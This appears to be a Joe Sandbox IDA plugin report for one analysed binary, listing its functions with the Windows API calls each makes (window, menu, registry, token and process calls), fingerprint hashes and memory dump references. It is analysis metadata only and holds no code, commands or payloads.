Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1dc889891e4fa5510f37541d848cf211403126a081bcc0b6a9b26190e59b7523
Instruction ID: c8ff0ada1ca3834898b9fb0e52da394244d657541b7dffd1f957c4685212b402
Opcode Fuzzy Hash: 1dc889891e4fa5510f37541d848cf211403126a081bcc0b6a9b26190e59b7523
Instruction Fuzzy Hash: BE213E35604205AF9B10ABF8DC89DBA77ECEF093A0B10C165F919DB261DAB49C41C764

Function 00BA75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B21D73
Part of subcall function 00B21D35: GetStockObject.GDI32(00000011), ref: 00B21D87
Part of subcall function 00B21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B21D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BA7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BA763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BA764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BA7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BA7665

Strings

Msctls_Progress32, xrefs: 00BA7603

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c0c39cb34990db25c29e124526f251a03309a91dacf7cef8dfe240d39dec192b
Instruction ID: 8905a9e45d4f25331e7e43b5b04a4c48a1316f9503a258e3587fd7018975444b
Opcode Fuzzy Hash: c0c39cb34990db25c29e124526f251a03309a91dacf7cef8dfe240d39dec192b
Instruction Fuzzy Hash: 2711C4B2154219BFEF118F68CC85EE77FADEF09798F014115BA04A70A0CB729C21DBA4

Function 00B49AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00B49AE6

Part of subcall function 00B43187: EncodePointer.KERNEL32(00000000), ref: 00B4318A
Part of subcall function 00B43187: __initp_misc_winsig.LIBCMT ref: 00B431A5
Part of subcall function 00B43187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B49EA0
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B49EB4
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B49EC7
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B49EDA
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B49EED
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B49F00
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B49F13
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B49F26
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B49F39
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B49F4C
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B49F5F
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B49F72
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B49F85
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B49F98
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B49FAB
Part of subcall function 00B43187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B49FBE

__mtinitlocks.LIBCMT ref: 00B49AEB
__mtterm.LIBCMT ref: 00B49AF4

Part of subcall function 00B49B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B49AF9,00B47CD0,00BDA0B8,00000014), ref: 00B49C56
Part of subcall function 00B49B5C: _free.LIBCMT ref: 00B49C5D
Part of subcall function 00B49B5C: DeleteCriticalSection.KERNEL32(00BDEC00,?,?,00B49AF9,00B47CD0,00BDA0B8,00000014), ref: 00B49C7F

__calloc_crt.LIBCMT ref: 00B49B19
__initptd.LIBCMT ref: 00B49B3B
GetCurrentThreadId.KERNEL32 ref: 00B49B42

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 3b91a92687629eaf685eb04956723cb0f2e4b4d5b76d31c9fb580e5722f91856
Instruction ID: 6bfc58f5abbae56bab25de13964ae2d4dd7aaf731f9c15795672d7d0a25f2b6d
Opcode Fuzzy Hash: 3b91a92687629eaf685eb04956723cb0f2e4b4d5b76d31c9fb580e5722f91856
Instruction Fuzzy Hash: 93F0B43250A7116AEA34B778BC13A8B37D0DF02734F200AEAF560D60D2FF208B4161A0

Function 00B4406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B43F85), ref: 00B44085
GetProcAddress.KERNEL32(00000000), ref: 00B4408C
EncodePointer.KERNEL32(00000000), ref: 00B44097
DecodePointer.KERNEL32(00B43F85), ref: 00B440B2

Strings

combase.dll, xrefs: 00B44080
RoUninitialize, xrefs: 00B44074

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 50a4daaf620e2ec6d46a8ad35bab0562cf138c4b2563bf464b5731720235e2e7
Instruction ID: 9736a2e14abca55b3b3b50492a18800ad3a9d5cbf25d69d60368001980a22539
Opcode Fuzzy Hash: 50a4daaf620e2ec6d46a8ad35bab0562cf138c4b2563bf464b5731720235e2e7
Instruction Fuzzy Hash: 14E09A70541341AFDB10AFA2EC4EBA53AE5B715B42F104468F101F71A0CFB686149A15

Function 00B21DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B21DDC
GetWindowRect.USER32(?,?), ref: 00B21E1D
ScreenToClient.USER32(?,?), ref: 00B21E45
GetClientRect.USER32(?,?), ref: 00B21F74
GetWindowRect.USER32(?,?), ref: 00B21F8D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 9654ec4fe7cee367af87c4d13eeb5b0b87051e6112366d4c96fc1d1d4b0a7c54
Instruction ID: e4e1ffac30db90c8526f7bae001afe200e14ed1bd58169b8d56d1bc7ab615e5c
Opcode Fuzzy Hash: 9654ec4fe7cee367af87c4d13eeb5b0b87051e6112366d4c96fc1d1d4b0a7c54
Instruction Fuzzy Hash: ABB15B7990064ADBDF10CFA8C581BEEB7F1FF18310F1485A9EC69AB254DB70AA50CB54

Function 00B864B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B8660B
_memmove.LIBCMT ref: 00B86546

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

_memmove.LIBCMT ref: 00B865B9
_memmove.LIBCMT ref: 00B866A0
_memmove.LIBCMT ref: 00B866B9
_memmove.LIBCMT ref: 00B866D5

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: e6f8a2d9ddaa6f23cf337a068b49f90081c60fc1e2931f424a261d052c97ca7d
Instruction ID: dfdb095023765dfb67204fde741cc88011712de0376bb62aa31f7b177fc6d6c8
Opcode Fuzzy Hash: e6f8a2d9ddaa6f23cf337a068b49f90081c60fc1e2931f424a261d052c97ca7d
Instruction Fuzzy Hash: D7618B309002AA9BCF11FF60DC82EFE37E5AF05308F044599F9596B2A2EB34E915DB55

Function 00BA01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00BA0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B9FDAD,?,?), ref: 00BA0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BA02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BA02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BA0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BA0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BA038C
RegCloseKey.ADVAPI32(00000000), ref: 00BA0399

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 01312a87f8dd57ebe4c8b5c9daf8582f0cc165ef8f153ce9ee601145b129f6e3
Instruction ID: 1d2db24073551f9de272b4c084a3e8ec0c6b5cb5d7ec520b5ada87f930993a05
Opcode Fuzzy Hash: 01312a87f8dd57ebe4c8b5c9daf8582f0cc165ef8f153ce9ee601145b129f6e3
Instruction Fuzzy Hash: 40515A31118305AFCB10EF64D885E6EBBE8FF8A314F04499DF559872A2DB31E905DB52

Function 00BA5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00BA57FB
GetMenuItemCount.USER32(00000000), ref: 00BA5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BA585A
GetMenuItemID.USER32(?,?), ref: 00BA58C9
GetSubMenu.USER32(?,?), ref: 00BA58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00BA5928

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 42b590b129f5a291b24bc70a5e9ebeda850fcb6c20f699e48295d2f135af2878
Instruction ID: 0d5628f9286c3894fcad4798e11cefdb3802676be2d439c832910c09ae3b0f6f
Opcode Fuzzy Hash: 42b590b129f5a291b24bc70a5e9ebeda850fcb6c20f699e48295d2f135af2878
Instruction Fuzzy Hash: 53516A35E04615AFCF21EFA4C845AAEB7F4EF49720F1440A9E855BB351CB34AE41DB90

Function 00B7EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B7EF06
VariantClear.OLEAUT32(00000013), ref: 00B7EF78
VariantClear.OLEAUT32(00000000), ref: 00B7EFD3
_memmove.LIBCMT ref: 00B7EFFD
VariantClear.OLEAUT32(?), ref: 00B7F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B7F078

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 4127b089c769a13274a5f687c1948953be91c474c7542cd8aff0a67cb459a392
Instruction ID: d787aea43bca2bd112082357b298855ea20207e2fa5e4f739d66458fc41a4869
Opcode Fuzzy Hash: 4127b089c769a13274a5f687c1948953be91c474c7542cd8aff0a67cb459a392
Instruction Fuzzy Hash: 3B514CB5A0020ADFDB14CF58C884AAAB7F8FF4D314B158569E959DB301E735E911CBA0

Function 00B8220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B822A3
IsMenu.USER32(00000000), ref: 00B822C3
CreatePopupMenu.USER32 ref: 00B822F7
GetMenuItemCount.USER32(000000FF), ref: 00B82355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B82386

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 73bcb1c8d35865216a5f5de4efb96cee12e1f0c3c0defd5518ae9743f8bd6d07
Instruction ID: aa8272a83d66db1cc68f29773681af76007653a857eaef0548c702ec337ae0e1
Opcode Fuzzy Hash: 73bcb1c8d35865216a5f5de4efb96cee12e1f0c3c0defd5518ae9743f8bd6d07
Instruction Fuzzy Hash: 9351D070A0020AEFDF21EF68D898BADBBF5FF06314F1041A9E811A72B0D7748A04CB55

Function 00B21765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00B2179A
GetWindowRect.USER32(?,?), ref: 00B217FE
ScreenToClient.USER32(?,?), ref: 00B2181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B2182C
EndPaint.USER32(?,?), ref: 00B21876

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 5f09434182ccf21c37911a28b57d55608811fe6416394a0fb4d5b9cf306a4631
Instruction ID: 1dd7f3d11277de21fa08f1cdeb78d6b80ca0e87e65e3ceca6bf5f2244d5be319
Opcode Fuzzy Hash: 5f09434182ccf21c37911a28b57d55608811fe6416394a0fb4d5b9cf306a4631
Instruction Fuzzy Hash: 8A41D331100751AFC720DF28DCC4FB67BE8EB5A324F1446A8F9A88B2B1CB309845DB61

Function 00BAB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00BE57B0,00000000,00CC55E0,?,?,00BE57B0,?,00BAB5A8,?,?), ref: 00BAB712
EnableWindow.USER32(00000000,00000000), ref: 00BAB736
ShowWindow.USER32(00BE57B0,00000000,00CC55E0,?,?,00BE57B0,?,00BAB5A8,?,?), ref: 00BAB796
ShowWindow.USER32(00000000,00000004,?,00BAB5A8,?,?), ref: 00BAB7A8
EnableWindow.USER32(00000000,00000001), ref: 00BAB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BAB7EF

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4ee6df7b9c0e39a4ca99ac292d6124f63efa500fc388b396984b05266a068b27
Instruction ID: 45a5e3c475615ce917e343e4e6aa5a36f7fbfc281af52882880fcadd3ddf395f
Opcode Fuzzy Hash: 4ee6df7b9c0e39a4ca99ac292d6124f63efa500fc388b396984b05266a068b27
Instruction Fuzzy Hash: 7A418F34609241AFDB22CF28C499FA47BE0FB46310F1841F9E9688F6A3C771AC56CB50

Function 00B9709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B94E41,?,?,00000000,00000001), ref: 00B970AC

Part of subcall function 00B939A0: GetWindowRect.USER32(?,?), ref: 00B939B3

GetDesktopWindow.USER32 ref: 00B970D6
GetWindowRect.USER32(00000000), ref: 00B970DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B9710F

Part of subcall function 00B85244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B852BC

GetCursorPos.USER32(?), ref: 00B9713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B97199

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 783d1363ac34da4628109842a6b81017e0aa2a7e8664e5e5a0feb305c7df0a5f
Instruction ID: ce4694e4c9369d645748f915fa652cf57368a53cd5c51cc73b0aed3496d30259
Opcode Fuzzy Hash: 783d1363ac34da4628109842a6b81017e0aa2a7e8664e5e5a0feb305c7df0a5f
Instruction Fuzzy Hash: DC31E472509316ABDB20DF54C849F9BB7E9FF89314F000929F585A7191CB30EA09CB92

Function 00B78879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B780C0
Part of subcall function 00B780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B780CA
Part of subcall function 00B780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B780D9
Part of subcall function 00B780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B780E0
Part of subcall function 00B780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B780F6

GetLengthSid.ADVAPI32(?,00000000,00B7842F), ref: 00B788CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B788D6
HeapAlloc.KERNEL32(00000000), ref: 00B788DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B788F6
GetProcessHeap.KERNEL32(00000000,00000000,00B7842F), ref: 00B7890A
HeapFree.KERNEL32(00000000), ref: 00B78911

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ef4a2372a030d714c21a1d80a1b4e82da5fba454bda92e1ef7495c67b839716f
Instruction ID: c749fc4825b637fb2af85a39d2cb6bd4903ad2967206a8a8b03027b114cefbcc
Opcode Fuzzy Hash: ef4a2372a030d714c21a1d80a1b4e82da5fba454bda92e1ef7495c67b839716f
Instruction Fuzzy Hash: ED11B13164120AFFDB109FA4DC0ABFE7BA8EB45311F1080A8E999A7110CB329D00DB61

Function 00B785B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B785E2
OpenProcessToken.ADVAPI32(00000000), ref: 00B785E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B785F8
CloseHandle.KERNEL32(00000004), ref: 00B78603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B78632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B78646

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 630cf66156f5005d1ae394e58d947c1e978e06e9b1dce4790b4ad12ca35493cf
Instruction ID: 609f9c1f4d30ef8eefa4180b9ccdd00f3b0ec3421d1d1ea661232801ea2f44f5
Opcode Fuzzy Hash: 630cf66156f5005d1ae394e58d947c1e978e06e9b1dce4790b4ad12ca35493cf
Instruction Fuzzy Hash: 94115C7254020AABDF118FE4DD49BEE7BE9EF09304F048064FE18A2160CB718D60EB60

Function 00B7B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B7B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B7B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B7B7CD
